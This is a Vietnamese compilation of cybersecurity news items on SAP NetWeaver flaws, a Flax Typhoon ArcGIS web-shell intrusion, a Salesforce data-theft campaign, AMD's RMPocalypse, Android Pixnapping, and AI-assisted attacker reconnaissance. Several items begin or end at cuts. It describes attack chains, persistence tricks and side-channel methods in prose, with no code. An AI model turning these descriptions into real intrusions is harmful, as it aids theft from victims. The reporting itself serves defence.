Các nhà nghiên cứu Priya Patel và Subhajeet Singha cho biết: "Phần mềm độc hại là một DLL .NET có chức năng đánh cắp và duy trì hoạt động cho các hoạt động độc hại trong tương lai".

Lỗ hổng bảo mật này, được theo dõi với tên gọi CVE-2025-42944, có điểm CVSS là 10.0. Nó được mô tả là một trường hợp giải tuần tự hóa không an toàn.

Theo mô tả về cờ này trong CVE.org, "Do lỗ hổng giải tuần tự hóa trong SAP NetWeaver, kẻ tấn công chưa được xác thực có thể khai thác hệ thống thông qua mô-đun RMI-P4 bằng cách gửi một phần mềm độc hại đến một cổng mở" .

"Việc hủy tuần tự hóa các đối tượng Java không đáng tin cậy như vậy có thể dẫn đến việc thực thi lệnh hệ điều hành tùy ý, gây ảnh hưởng lớn đến tính bảo mật, tính toàn vẹn và tính khả dụng của ứng dụng."

Mặc dù SAP đã giải quyết lỗ hổng này lần đầu tiên vào tháng trước, công ty bảo mật Onapsis cho biết bản sửa lỗi mới nhất cung cấp các biện pháp bảo vệ bổ sung để chống lại rủi ro do quá trình hủy tuần tự hóa gây ra.

"Lớp bảo vệ bổ sung dựa trên việc triển khai bộ lọc trên toàn JVM (jdk.serialFilter) để ngăn chặn việc hủy tuần tự hóa các lớp chuyên dụng", bài viết lưu ý . "Danh sách các lớp và gói được khuyến nghị chặn đã được xác định với sự hợp tác của ORL và được chia thành phần bắt buộc và phần tùy chọn."

Một lỗ hổng nghiêm trọng khác đáng chú ý là CVE-2025-42937 (điểm CVSS: 9,8), một lỗ hổng duyệt thư mục trong SAP Print Service phát sinh do xác thực đường dẫn không đủ, cho phép kẻ tấn công chưa được xác thực tiếp cận thư mục gốc và ghi đè lên các tệp hệ thống.

Lỗ hổng nghiêm trọng thứ ba được SAP vá liên quan đến lỗi tải tệp không giới hạn trong SAP Supplier Relationship Management ( CVE-2025-42910 , điểm CVSS: 9.0) có thể cho phép kẻ tấn công tải lên các tệp tùy ý, bao gồm các tệp thực thi độc hại có thể ảnh hưởng đến tính bảo mật, tính toàn vẹn và tính khả dụng của ứng dụng.

Mặc dù không có bằng chứng nào cho thấy những lỗ hổng này đang bị khai thác ngoài thực tế, nhưng điều quan trọng là người dùng phải áp dụng các bản vá và biện pháp giảm thiểu mới nhất càng sớm càng tốt để tránh các mối đe dọa tiềm ẩn.

"Việc giải tuần tự hóa vẫn là rủi ro lớn nhất", Jonathan Stross của Pathlock cho biết . "Chuỗi P4/RMI tiếp tục gây ra sự cố nghiêm trọng trong AS Java, với việc SAP phát hành cả bản sửa lỗi trực tiếp và cấu hình JVM được củng cố để giảm thiểu việc lạm dụng lớp tiện ích."

Theo : TheHackerNews

Theo ReliaQuest, hoạt động này là sản phẩm của một nhóm tin tặc do nhà nước Trung Quốc tài trợ có tên Flax Typhoon , còn được gọi là Ethereal Panda và RedJuliett. Theo chính phủ Hoa Kỳ, nhóm này được đánh giá là một công ty niêm yết công khai có trụ sở tại Bắc Kinh, được gọi là Integrity Technology Group.

"Nhóm này đã khéo léo sửa đổi phần mở rộng đối tượng máy chủ Java (SOE) của một ứng dụng bản đồ địa lý thành một web shell hoạt động", công ty an ninh mạng cho biết trong một báo cáo được chia sẻ với The Hacker News. "Bằng cách kiểm soát truy cập bằng một khóa được mã hóa cứng để kiểm soát độc quyền và nhúng nó vào các bản sao lưu hệ thống, chúng đã đạt được khả năng tồn tại lâu dài, sâu sắc, có thể tồn tại sau khi khôi phục toàn bộ hệ thống."

Flax Typhoon được biết đến với khả năng "tàng hình" trong nghề của mình bằng cách kết hợp rộng rãi các phương pháp sống ngoài thực địa (LotL) và hoạt động thực hành trên bàn phím, qua đó biến các thành phần phần mềm thành phương tiện cho các cuộc tấn công độc hại, đồng thời tránh bị phát hiện.

Cuộc tấn công cho thấy kẻ tấn công ngày càng lạm dụng các công cụ và dịch vụ đáng tin cậy để vượt qua các biện pháp bảo mật và truy cập trái phép vào hệ thống của nạn nhân, đồng thời trà trộn vào lưu lượng máy chủ thông thường.

"Chuỗi tấn công cực kỳ thông minh" liên quan đến các tác nhân đe dọa nhắm vào máy chủ ArcGIS công khai bằng cách xâm phạm tài khoản quản trị viên cổng thông tin để triển khai SOE độc hại.

"Những kẻ tấn công đã kích hoạt SOE độc hại bằng tiện ích mở rộng ArcGIS [JavaSimpleRESTSOE] tiêu chuẩn, kích hoạt một hoạt động REST để chạy các lệnh trên máy chủ nội bộ thông qua cổng thông tin công cộng—khiến hoạt động của chúng khó bị phát hiện", ReliaQuest cho biết. "Bằng cách thêm một khóa được mã hóa cứng, Flax Typhoon đã ngăn chặn những kẻ tấn công khác, hoặc thậm chí cả những quản trị viên tò mò, xâm nhập vào quyền truy cập của nó."

"Web Shell" được cho là đã được sử dụng để chạy các hoạt động khám phá mạng, thiết lập tính bền bỉ bằng cách tải lên tệp thực thi SoftEther VPN đã đổi tên ("bridge.exe") vào thư mục "System32", sau đó tạo một dịch vụ có tên "SysBridge" để tự động khởi động tệp nhị phân mỗi khi máy chủ được khởi động lại.

Tiến trình "bridge.exe" được phát hiện có khả năng thiết lập các kết nối HTTPS đi đến địa chỉ IP do kẻ tấn công kiểm soát trên cổng 443 với mục tiêu chính là thiết lập kênh VPN bí mật đến máy chủ bên ngoài.

"Cầu nối VPN này cho phép kẻ tấn công mở rộng mạng cục bộ của mục tiêu đến một vị trí từ xa, khiến kẻ tấn công trông như thể là một phần của mạng nội bộ", các nhà nghiên cứu Alexa Feminella và James Xiang giải thích. "Điều này cho phép chúng vượt qua hệ thống giám sát cấp độ mạng, hoạt động như một cửa hậu cho phép chúng thực hiện thêm các hoạt động di chuyển ngang và xâm nhập."

Các tác nhân đe dọa được cho là đã nhắm mục tiêu cụ thể vào hai máy trạm của nhân viên CNTT để lấy thông tin đăng nhập và xâm nhập sâu hơn vào mạng. Điều tra sâu hơn đã phát hiện ra rằng kẻ tấn công đã truy cập vào tài khoản quản trị và có thể đặt lại mật khẩu.

"Cuộc tấn công này không chỉ làm nổi bật sự sáng tạo và tinh vi của kẻ tấn công mà còn cho thấy mối nguy hiểm của việc chức năng hệ thống đáng tin cậy bị lợi dụng để tránh bị phát hiện theo cách truyền thống", các nhà nghiên cứu lưu ý. "Vấn đề không chỉ là phát hiện hoạt động độc hại; mà còn là nhận biết cách các công cụ và quy trình hợp pháp có thể bị thao túng và sử dụng để chống lại bạn."

Theo : TheHackerNews

Theo các chuyên gia, chiến dịch này bắt đầu khi nhiều doanh nghiệp phát hiện những truy vấn bất thường trong hệ thống Salesforce của mình, thường xuất hiện vào ban đêm. Các log điều tra cho thấy lượng dữ liệu bị truy cập vượt xa ngưỡng bình thường, hé lộ một công cụ tự động trích xuất dữ liệu quy mô lớn đang hoạt động trong nền.

Nhóm hacker đã kết hợp lừa đảo qua email (phishing) và tấn công nhồi thông tin đăng nhập (credential stuffing) để xâm nhập ban đầu. Nạn nhân nhận được email trông như thông báo cập nhật bảo mật hợp pháp của Salesforce hoặc Microsoft Office, kèm tệp macro độc hại. Khi mở tệp, macro này sẽ âm thầm tải xuống một trình nạp (loader) được viết bằng ngôn ngữ Go, liên hệ với máy chủ điều khiển của hacker.

Sau khi xâm nhập, phần mềm độc hại sử dụng PowerShell để kích hoạt tải về mã độc chính. Công cụ này kiểm tra xem có đang bị phân tích trong môi trường sandbox hay không, rồi tiếp tục đánh cắp thông tin đăng nhập trong Windows Credential Manager và dùng chúng để đăng nhập vào API của Salesforce.

Một khi đã có quyền truy cập, mã độc tự động quét cấu trúc dữ liệu, tạo các truy vấn để tải xuống dữ liệu từng phần, từ thông tin khách hàng, dự báo doanh thu, hợp đồng, chiến lược kinh doanh cho đến các tệp nội bộ. Tất cả được mã hóa bằng thuật toán ChaCha20 trước khi gửi về máy chủ hacker qua kết nối HTTPS, giúp tránh bị phát hiện.

Đáng chú ý, phần mềm còn thiết lập tác vụ định kỳ (Scheduled Task) tên UpdaterSvc để tự khởi động lại quá trình trích xuất dữ liệu mỗi 2 giờ, bảo đảm duy trì quyền truy cập và “hút sạch” dữ liệu mà không cần người dùng hay hệ thống biết.

Các nhà phân tích ước tính tốc độ rò rỉ dữ liệu có thể lên đến 500GB mỗi giờ, cho thấy nhóm tấn công đã tối ưu hóa rất tốt hạ tầng và kỹ thuật của mình. Điều này không chỉ đe dọa thông tin cá nhân của khách hàng mà còn làm lộ các chiến lược kinh doanh, kế hoạch bán hàng và dữ liệu đàm phán bí mật, những tài sản vô giá của doanh nghiệp.

Do Salesforce là nền tảng trung tâm trong nhiều quy trình kinh doanh, một vụ xâm nhập như vậy có thể gây tê liệt hoạt động, thiệt hại danh tiếng và mất lòng tin nghiêm trọng.

Theo giới chuyên gia, vụ việc này phản ánh rủi ro ngày càng lớn trong việc bảo mật hạ tầng đám mây, nơi chỉ cần một tài khoản API hoặc cấu hình sai cũng đủ để hacker thâm nhập. Để giảm thiểu rủi ro, doanh nghiệp cần:

• Bật xác thực đa yếu tố (MFA) cho mọi tài khoản quản trị và API.

• Kiểm tra và giới hạn phân quyền truy cập của các tài khoản dịch vụ.

• Tắt hoặc giám sát các macro trong email Office, đặc biệt với tệp lạ.

• Thiết lập cảnh báo bất thường trong nhật ký Salesforce (log monitoring).

• Định kỳ rà soát các API và token cũ không còn sử dụng.

Vụ việc của Scattered Lapsus$ Hunters là lời nhắc bảo mật đám mây không chỉ phụ thuộc vào nhà cung cấp, mà còn ở cách người dùng quản lý tài khoản, quyền truy cập và quy trình nội bộ. Khi các nhóm tin tặc ngày càng chuyên sâu vào khai thác API và tự động hóa tấn công, các doanh nghiệp buộc phải chuyển từ tư duy “phòng thủ” sang “phòng ngừa thông minh”, trước khi dữ liệu quý giá của họ bị “hút sạch” chỉ trong vài giờ.

Theo : Bkav Cyber Security

Đừng hiểu lầm, là một chuyên gia an ninh, tôi rất yêu tháng này. Được CISA và Liên minh An ninh mạng Quốc gia (National Cybersecurity Alliance - NCA) khởi động vào năm 2004, tháng này được thiết kế để biến an ninh thành trách nhiệm chung. Nó giúp người dân, doanh nghiệp và các cơ quan công quyền xây dựng thói quen sử dụng công nghệ số an toàn hơn. Và nó đã thành công. Nó thu hút sự chú ý đến rủi ro dưới nhiều hình thức, khơi mào những cuộc trò chuyện mà nếu không có nó, có thể đã không diễn ra, và giúp nhân viên nhận thức được vai trò và ảnh hưởng cá nhân của họ đối với an ninh của tổ chức.

Các sáng kiến ​​trong Tháng nâng cao nhận thức về an ninh giúp tăng cường sự tự tin, nâng cao bản năng và luôn đặt vấn đề an ninh lên hàng đầu trong tâm trí mọi người... cho đến khi đồ trang trí cho kỳ nghỉ lễ mùa đông bắt đầu được treo lên.

Sau đó, đà tiến triển sẽ giảm dần. Nhận thức sẽ nhanh chóng bị lu mờ nếu không được củng cố. Mọi người đều biết phải làm gì, nhưng áp lực hàng ngày và sự thay đổi thứ tự ưu tiên khiến mật khẩu yếu, cấu hình sai và tài khoản không sử dụng lại xuất hiện. Tiến bộ thực sự cần một cấu trúc xác minh những gì mọi người nhớ và nắm bắt những gì họ bỏ lỡ - những hệ thống liên tục xác thực danh tính, cấu hình và đặc quyền.

Trong bài viết này, tôi sẽ xem xét kỹ hơn lý do tại sao nhận thức đơn thuần không thể đảm bảo an ninh toàn diện và cách chủ động tìm kiếm mối đe dọa giúp thu hẹp khoảng cách giữa những gì chúng ta biết và những gì chúng ta thực sự có thể ngăn chặn.

Giới hạn của nhận thức#

Tháng Nhận thức An ninh nhấn mạnh khía cạnh con người của công tác phòng thủ. Nó nhắc nhở nhân viên rằng mỗi cú nhấp chuột, thông tin đăng nhập và kết nối đều quan trọng. Trọng tâm đó có giá trị, và tôi đã thấy các tổ chức đầu tư mạnh mẽ vào các chiến dịch sáng tạo thực sự thay đổi hành vi của nhân viên.

Tuy nhiên, nhiều tổ chức trong số này vẫn gặp phải các vi phạm nghiêm trọng. Lý do là nhiều vi phạm bắt đầu từ những nơi mà đào tạo không thể tiếp cận được. Chỉ riêng việc cấu hình bảo mật sai đã chiếm hơn một phần ba tổng số sự cố mạng và khoảng một phần tư các sự cố bảo mật đám mây. Tín hiệu rất rõ ràng: nhận thức có giới hạn. Nó có thể cải thiện việc ra quyết định, nhưng không thể sửa chữa những gì mọi người không bao giờ nhìn thấy.

Một phần của vấn đề là các biện pháp phòng thủ truyền thống chủ yếu tập trung vào phát hiện và ứng phó. EDR cảnh báo về hoạt động đáng ngờ. SIEM đối chiếu các sự kiện sau khi chúng xảy ra. Máy quét lỗ hổng xác định các điểm yếu đã biết. Các công cụ này hoạt động chủ yếu ở phía bên phải của Ma trận Phòng thủ Mạng , tập trung vào các giai đoạn phòng thủ phản ứng.

Phòng thủ hiệu quả cần được bắt đầu sớm hơn. Phần chủ động bên trái của Ma trận - nhận dạng và bảo vệ - nên dựa trên sự đảm bảo, chứ không phải giả định. Săn tìm mối đe dọa chủ động thiết lập một cơ chế cung cấp những đảm bảo này, hỗ trợ quá trình nhận thức khởi tạo. Tạo ra một cơ chế cung cấp những đảm bảo đó - hỗ trợ quá trình nhận thức khởi động. Nó tìm kiếm các cấu hình sai, thông tin đăng nhập bị lộ và các đặc quyền quá mức tạo ra cơ hội tấn công, sau đó loại bỏ chúng trước khi kẻ thù có thể khai thác.

Săn tìm mối đe dọa chủ động thay đổi phương trình#

Phòng thủ tốt nhất bắt đầu trước khi có cảnh báo đầu tiên. Săn tìm mối đe dọa chủ động xác định các điều kiện cho phép một cuộc tấn công hình thành và xử lý chúng sớm. Nó chuyển đổi an ninh từ quan sát thụ động sang hiểu rõ nguồn gốc của sự phơi nhiễm.

Việc chuyển từ quan sát sang chủ động tìm hiểu này tạo nên cốt lõi của một chương trình bảo mật hiện đại: Quản lý Tiếp xúc Mối đe dọa Liên tục (CTEM). Thay vì một dự án một lần, chương trình CTEM cung cấp một khuôn khổ có cấu trúc, có thể lặp lại để liên tục mô hình hóa các mối đe dọa, xác thực các biện pháp kiểm soát và bảo mật doanh nghiệp. Đối với các tổ chức đã sẵn sàng xây dựng năng lực này, Hướng dẫn Thực hành Bắt đầu với CTEM cung cấp một lộ trình rõ ràng.

Kẻ tấn công đã áp dụng mô hình này. Các chiến dịch ngày nay của kẻ tấn công liên kết việc sử dụng sai danh tính, tái sử dụng thông tin đăng nhập và di chuyển ngang qua các môi trường lai với tốc độ máy móc. Tự động hóa do AI điều khiển lập bản đồ và trang bị vũ khí cho toàn bộ cơ sở hạ tầng chỉ trong vài phút. Các nhóm kiểm tra môi trường của mình dưới góc nhìn của kẻ tấn công có thể thấy cách những sơ suất nhỏ kết nối thành các đường dẫn tấn công toàn diện, cho phép kẻ tấn công len lỏi qua các lớp phòng thủ. Điều này biến dữ liệu rủi ro rải rác thành một bức tranh sống động về cách thức xâm phạm diễn ra và cách ngăn chặn sớm.

Bên phòng thủ cần có tầm nhìn sâu rộng về bối cảnh mà bên tấn công đã có. Việc chủ động săn tìm mối đe dọa sẽ tạo ra tầm nhìn đó - xây dựng sự sẵn sàng theo ba giai đoạn:

1. Thu thập Dữ liệu Chính xác – Thu thập lỗ hổng, thiết kế mạng, kết nối, danh tính (cả SSO và dữ liệu được lưu trữ trong bộ nhớ đệm) và dữ liệu cấu hình của từng hệ thống từ mọi phần của môi trường để tạo ra một góc nhìn tập trung vào kẻ tấn công duy nhất. Mục tiêu là xem xét những gì kẻ tấn công sẽ thấy, bao gồm thông tin xác thực yếu, lỗ hổng bảo mật đám mây và các mối quan hệ đặc quyền tạo ra điểm xâm nhập. Bản sao kỹ thuật số cung cấp một giải pháp thiết thực để sao chép môi trường một cách an toàn và xem tất cả các điểm tiếp xúc tại một nơi.

2. Bản đồ Đường dẫn Tấn công – Sử dụng bản sao kỹ thuật số để kết nối các điểm phơi nhiễm và tài sản, minh họa cách thức xâm phạm có thể lan rộng trong môi trường và tác động đến các hệ thống quan trọng. Bản đồ này cho thấy các chuỗi khai thác quan trọng. Nó thay thế các giả định bằng bằng chứng, cho thấy chính xác cách nhiều điểm phơi nhiễm nhỏ hội tụ để tạo thành một đường dẫn tấn công.

3. Ưu tiên theo Tác động Kinh doanh – Liên kết từng lộ trình đã được xác thực với các tài sản và quy trình hỗ trợ hoạt động kinh doanh. Giai đoạn này chuyển đổi các phát hiện kỹ thuật thành rủi ro kinh doanh, tập trung khắc phục các rủi ro có thể gây ra gián đoạn kinh doanh lớn nhất. Kết quả là sự rõ ràng - một tập hợp các hành động được xác minh và ưu tiên, trực tiếp củng cố khả năng phục hồi.

Nhận thức là một nền tảng quan trọng. Tuy nhiên, việc chủ động săn tìm mối đe dọa mang lại cho người bảo vệ điều mà chỉ nhận thức không thể mang lại - bằng chứng. Nó cho thấy chính xác vị thế của tổ chức và tốc độ thu hẹp khoảng cách giữa khả năng hiển thị và phòng ngừa.

Từ nhận thức đến sự sẵn sàng#

Tháng Nhận thức An ninh nhắc nhở chúng ta rằng nhận thức là một bước thiết yếu. Tuy nhiên, tiến bộ thực sự chỉ bắt đầu khi nhận thức dẫn đến hành động. Nhận thức chỉ mạnh mẽ khi các hệ thống đo lường và xác thực nó. Việc chủ động săn tìm mối đe dọa biến nhận thức thành sự sẵn sàng bằng cách tập trung vào những gì quan trọng nhất - những điểm yếu tạo thành nền tảng cho các cuộc tấn công trong tương lai.

Nhận thức giúp mọi người nhìn nhận rủi ro. Săn tìm mối đe dọa chứng minh liệu rủi ro có còn tồn tại hay không. Cùng nhau, chúng tạo thành một chu trình liên tục, duy trì an ninh hiệu quả lâu dài sau khi các chiến dịch nâng cao nhận thức kết thúc. Tháng 10 này, câu hỏi đặt ra cho mọi tổ chức không phải là có bao nhiêu nhân viên đã hoàn thành khóa đào tạo, mà là bạn tự tin đến mức nào về khả năng phòng thủ của mình nếu có người kiểm tra chúng. Nhận thức tạo nên sự hiểu biết. Sự sẵn sàng mang lại sự bảo vệ.

Theo : TheHackerNews

Theo các nhà nghiên cứu Benedict Schlüter và Shweta Shinde của ETH Zürich, cuộc tấn công này khai thác các biện pháp bảo vệ không đầy đủ của AMD cho phép thực hiện một lần ghi bộ nhớ duy nhất vào bảng Reverse Map Paging (RMP), một cấu trúc dữ liệu được sử dụng để lưu trữ siêu dữ liệu bảo mật cho tất cả các trang DRAM trong hệ thống.

Theo tài liệu đặc tả của AMD, "Bảng Bản đồ Ngược (RMP) là một cấu trúc nằm trong DRAM và ánh xạ địa chỉ vật lý hệ thống (sPA) thành địa chỉ vật lý khách (gPA)". "Chỉ có một RMP cho toàn bộ hệ thống, được cấu hình bằng các thanh ghi dành riêng cho mô hình x86 (MSR)."

"RMP cũng chứa nhiều thuộc tính bảo mật khác nhau của từng RMP được quản lý bởi trình quản lý siêu giám sát thông qua các biện pháp kiểm soát qua phần cứng và phần mềm."

AMD sử dụng cái gọi là Bộ xử lý Bảo mật Nền tảng (PSP) để khởi tạo RMP, một yếu tố quan trọng để kích hoạt SEV-SNP trên nền tảng. RMPocalypse khai thác lỗ hổng quản lý bộ nhớ trong bước khởi tạo này, cho phép kẻ tấn công truy cập thông tin nhạy cảm, vi phạm các biện pháp bảo vệ tính bảo mật và toàn vẹn của SEV-SNP.

Nguyên nhân cốt lõi của vấn đề là thiếu các biện pháp bảo vệ đầy đủ cho cơ chế bảo mật -- một tình huống tiến thoái lưỡng nan phát sinh do RMP không được bảo vệ đầy đủ khi máy ảo được khởi động, dẫn đến RMP bị hỏng.

"Khoảng cách này có thể cho phép kẻ tấn công truy cập từ xa vượt qua một số chức năng bảo vệ và thao túng môi trường máy ảo, vốn được thiết kế để cô lập an toàn", ETH Zürich cho biết . "Lỗ hổng này có thể bị khai thác để kích hoạt các chức năng ẩn (chẳng hạn như chế độ gỡ lỗi), mô phỏng kiểm tra bảo mật (còn gọi là giả mạo chứng thực) và khôi phục trạng thái trước đó (tấn công phát lại) - và thậm chí chèn mã độc."

Các nhà nghiên cứu phát hiện ra rằng việc khai thác thành công RMPocalypse có thể cho phép kẻ xấu can thiệp tùy ý vào quá trình thực thi của các máy ảo bí mật (CVM) và đánh cắp tất cả các bí mật với tỷ lệ thành công 100%.

Để ứng phó với những phát hiện này, AMD đã gán mã định danh CVE CVE-2025-0033 (điểm CVSS v4: 5.9) cho lỗ hổng, mô tả đây là tình trạng chạy đua (race condition) có thể xảy ra khi Bộ xử lý bảo mật AMD (ASP hoặc PSP) đang khởi tạo RMP. Kết quả là, nó có thể cho phép một trình quản lý ảo độc hại thao túng nội dung RMP ban đầu, có khả năng dẫn đến mất tính toàn vẹn của bộ nhớ khách SEV-SNP.

Nhà sản xuất chip lưu ý trong thông báo phát hành hôm thứ Hai rằng: "Việc kiểm soát truy cập không đúng cách trong AMD SEV-SNP có thể cho phép kẻ tấn công có đặc quyền quản trị viên ghi vào RMP trong quá trình khởi tạo SNP, có khả năng dẫn đến mất tính toàn vẹn của bộ nhớ khách SEV-SNP" .

AMD đã tiết lộ rằng các chipset sau đây bị ảnh hưởng bởi lỗ hổng này -

• Bộ xử lý AMD EPYC™ dòng 7003

• Bộ xử lý AMD EPYC™ 8004 Series

• Bộ xử lý AMD EPYC™ dòng 9004

• Bộ xử lý AMD EPYC™ dòng 9005

• Bộ xử lý AMD EPYC™ Embedded 7003 Series (Bản sửa lỗi dự kiến ​​phát hành vào tháng 11 năm 2025)

• Bộ xử lý AMD EPYC™ Embedded 8004 Series

• Bộ xử lý AMD EPYC™ Embedded 9004 Series

• Bộ xử lý AMD EPYC™ Embedded 9004 Series

• Bộ xử lý AMD EPYC™ Embedded 9005 Series (Bản sửa lỗi dự kiến ​​phát hành vào tháng 11 năm 2025)

Microsoft và Supermicro cũng đã xác nhận lỗi CVE-2025-0033, đồng thời cho biết nhà sản xuất Windows đang nỗ lực khắc phục lỗi này trong các cụm máy chủ chạy AMD của Azure Confidential Computing (ACC). Supermicro cho biết các SKU bo mạch chủ bị ảnh hưởng cần được cập nhật BIOS để khắc phục lỗi.

"RMPocalypse cho thấy cơ chế bảo vệ nền tảng của AMD chưa hoàn thiện, do đó tạo ra một cơ hội nhỏ cho kẻ tấn công ghi đè RMP một cách ác ý khi khởi tạo", các nhà nghiên cứu cho biết. "Do thiết kế của RMP, chỉ cần ghi đè 8 byte trong RMP là toàn bộ RMP sẽ bị xâm phạm."

"Khi RMP bị xâm phạm, mọi đảm bảo về tính toàn vẹn của SEV-SNP đều trở nên vô hiệu. Các nghiên cứu điển hình của RMPocalypse cho thấy RMP do kẻ tấn công kiểm soát không chỉ làm mất tính toàn vẹn mà còn dẫn đến vi phạm hoàn toàn tính bảo mật."

Sự phát triển này diễn ra vài tuần sau khi một nhóm học giả từ KU Leuven và Đại học Birmingham trình diễn một lỗ hổng bảo mật mới có tên là Battering RAM để vượt qua các biện pháp phòng thủ mới nhất trên bộ xử lý đám mây Intel và AMD.

Theo : TheHackerNews

Cuộc tấn công này được một nhóm học giả từ Đại học California (Berkeley), Đại học Washington, Đại học California (San Diego) và Đại học Carnegie Mellon đặt tên mã là Pixnapping .

Về cơ bản, Pixnapping là một nền tảng đánh cắp pixel nhắm vào các thiết bị Android theo cách bỏ qua các biện pháp giảm thiểu của trình duyệt và thậm chí lấy cắp dữ liệu từ các ứng dụng không phải trình duyệt như Google Authenticator bằng cách tận dụng API Android và kênh phụ phần cứng, cho phép ứng dụng độc hại sử dụng kỹ thuật này để thu thập mã 2FA trong vòng chưa đầy 30 giây.

"Quan sát chính của chúng tôi là API Android cho phép kẻ tấn công tạo ra các cuộc tấn công tương tự như kiểu tấn công của [Paul] Stone bên ngoài trình duyệt", các nhà nghiên cứu cho biết trong một bài báo. "Cụ thể, một ứng dụng độc hại có thể ép các pixel của nạn nhân vào đường dẫn kết xuất thông qua các ý định Android và tính toán trên các pixel đó bằng cách sử dụng một chồng các hoạt động Android bán trong suốt."

Nghiên cứu tập trung cụ thể vào năm thiết bị của Google và Samsung chạy Android phiên bản 13 đến 16 và mặc dù không rõ liệu các thiết bị Android từ các nhà sản xuất thiết bị gốc (OEM) khác có dễ bị Pixnapping hay không, nhưng phương pháp cơ bản cần thiết để thực hiện cuộc tấn công này đều có trong tất cả các thiết bị chạy hệ điều hành di động.

Điều làm cho cuộc tấn công mới này trở nên đáng chú ý là bất kỳ ứng dụng Android nào cũng có thể bị lợi dụng để thực thi nó, ngay cả khi ứng dụng không được cấp bất kỳ quyền đặc biệt nào thông qua tệp manifest. Tuy nhiên, cuộc tấn công này giả định rằng nạn nhân đã bị thuyết phục bằng một số cách khác để cài đặt và khởi chạy ứng dụng.

Kênh phụ giúp Pixnapping khả thi là GPU.zip , được một số nhà nghiên cứu tiết lộ vào tháng 9 năm 2023. Cuộc tấn công này về cơ bản lợi dụng tính năng nén trong GPU tích hợp hiện đại (iGPU) để thực hiện các cuộc tấn công đánh cắp pixel gốc chéo trong trình duyệt bằng cách sử dụng bộ lọc SVG.

Kiểu tấn công mới nhất kết hợp điều này với API làm mờ cửa sổ của Android để rò rỉ dữ liệu kết xuất và cho phép đánh cắp dữ liệu từ ứng dụng nạn nhân. Để thực hiện điều này, một ứng dụng Android độc hại được sử dụng để gửi các pixel của ứng dụng nạn nhân vào đường ống kết xuất và phủ lên các hoạt động bán trong suốt bằng cách sử dụng intents - một cơ chế phần mềm Android cho phép điều hướng giữa các ứng dụng và hoạt động .

Nói cách khác, ý tưởng là gọi một ứng dụng mục tiêu chứa thông tin quan tâm (ví dụ: mã 2FA) và gửi dữ liệu để render. Sau đó, ứng dụng giả mạo được cài đặt trên thiết bị sẽ cô lập tọa độ của một pixel mục tiêu (tức là những pixel chứa mã 2FA) và kích hoạt một chồng các hoạt động bán trong suốt để che giấu, phóng to và truyền pixel đó bằng kênh phụ. Bước này sau đó được lặp lại cho mỗi pixel được đưa vào đường ống render.

Các nhà nghiên cứu cho biết Android dễ bị Pixnapping do sự kết hợp của ba yếu tố cho phép ứng dụng -

• Gửi các hoạt động của ứng dụng khác đến đường ống kết xuất Android (ví dụ: với ý định)

• Tạo ra các hoạt động đồ họa (ví dụ: làm mờ) trên các điểm ảnh được hiển thị bởi các hoạt động của ứng dụng khác

• Đo lường các tác dụng phụ phụ thuộc vào màu pixel của các hoạt động đồ họa

Google đang theo dõi sự cố này với mã định danh CVE là CVE-2025-48561 (điểm CVSS: 5.5). Các bản vá cho lỗ hổng đã được gã khổng lồ công nghệ phát hành trong Bản tin Bảo mật Android tháng 9 năm 2025 , với lưu ý rằng: "Một ứng dụng yêu cầu rất nhiều hiệu ứng làm mờ: (1) cho phép đánh cắp điểm ảnh bằng cách đo thời gian thực hiện hiệu ứng làm mờ trên các cửa sổ, [và] (2) có lẽ không thực sự hợp lệ."

Tuy nhiên, sau đó người ta phát hiện ra rằng có một giải pháp thay thế có thể được sử dụng để kích hoạt lại Pixnapping. Công ty được cho là đang nỗ lực khắc phục sự cố.

Hơn nữa, nghiên cứu còn phát hiện ra rằng hậu quả của hành vi này là kẻ tấn công có thể xác định xem một ứng dụng tùy ý có được cài đặt trên thiết bị hay không, vượt qua các hạn chế được áp dụng kể từ Android 11 vốn ngăn chặn việc truy vấn danh sách tất cả các ứng dụng đã cài đặt trên thiết bị của người dùng. Việc bỏ qua danh sách ứng dụng vẫn chưa được vá, và Google đánh dấu nó là "sẽ không sửa".

Các nhà nghiên cứu kết luận: "Giống như các trình duyệt lúc ban đầu, thiết kế có chủ đích hợp tác và nhiều bên tham gia của lớp ứng dụng di động khiến cho những hạn chế hiển nhiên trở nên kém hấp dẫn".

"Phân lớp ứng dụng sẽ không biến mất, và các ứng dụng phân lớp sẽ trở nên vô dụng nếu không có chế độ hạn chế cookie của bên thứ ba. Một giải pháp thực tế là làm cho các cuộc tấn công mới kém hấp dẫn như các cuộc tấn công cũ: cho phép các ứng dụng nhạy cảm lựa chọn không tham gia và hạn chế khả năng đo lường của kẻ tấn công để bất kỳ bằng chứng khái niệm nào cũng chỉ là như vậy."

Theo : TheHackerNews

Mặc dù câu chuyện thường mô tả AI như thể đang điều khiển mọi thứ, nhưng chúng ta không thấy AI nắm quyền kiểm soát hoàn toàn các hoạt động tấn công. AI không tự động viết mã khai thác, xâu chuỗi các cuộc tấn công và xâm nhập hệ thống mà không có sự can thiệp của con người. Những gì nó đang làm là đẩy nhanh các giai đoạn đầu và giữa của quy trình làm việc của kẻ tấn công: thu thập thông tin, làm giàu thông tin và tạo ra các hướng thực thi hợp lý.

Hãy nghĩ về nó như một bài viết do AI tạo ra; AI có thể tạo ra một bản thảo nhanh chóng với các thông số phù hợp, nhưng vẫn cần có người xem xét, tinh chỉnh và điều chỉnh để kết quả hữu ích. Điều tương tự cũng đúng với an ninh tấn công. AI có thể xây dựng các tải trọng và thực hiện nhiều chức năng ở cấp độ cao hơn so với các thuật toán truyền thống, nhưng cho đến nay chúng vẫn cần có định hướng và bối cảnh để hoạt động hiệu quả. Sự thay đổi này quan trọng vì nó mở rộng phạm vi mà chúng ta coi là phơi nhiễm.

Một thư viện lỗi thời trước đây chỉ là một mối nguy hiểm nếu nó có mã CVE đã được biết đến. Ngày nay, nó có thể trở thành một mối nguy hiểm nếu nó cho kẻ tấn công biết bạn đang sử dụng framework nào và giúp chúng thu hẹp phạm vi tấn công. Đó chính là sự khác biệt. AI giúp biến những chi tiết tưởng chừng vô hại thành những thông tin hữu ích - không phải bằng vũ lực, mà bằng sự hiểu biết sâu sắc hơn. Vì vậy, mặc dù AI không thay đổi cách thức kẻ tấn công xâm nhập, nhưng nó đang thay đổi cách chúng quyết định nên tìm kiếm ở đâu và điều gì đáng để chúng dành thời gian.

Siêu năng lực trinh sát của AI#

Quá trình ra quyết định xác định điều gì có liên quan, điều gì dễ bị tổn thương và điều gì đáng theo đuổi chính là nơi AI đã chứng minh được giá trị của mình.

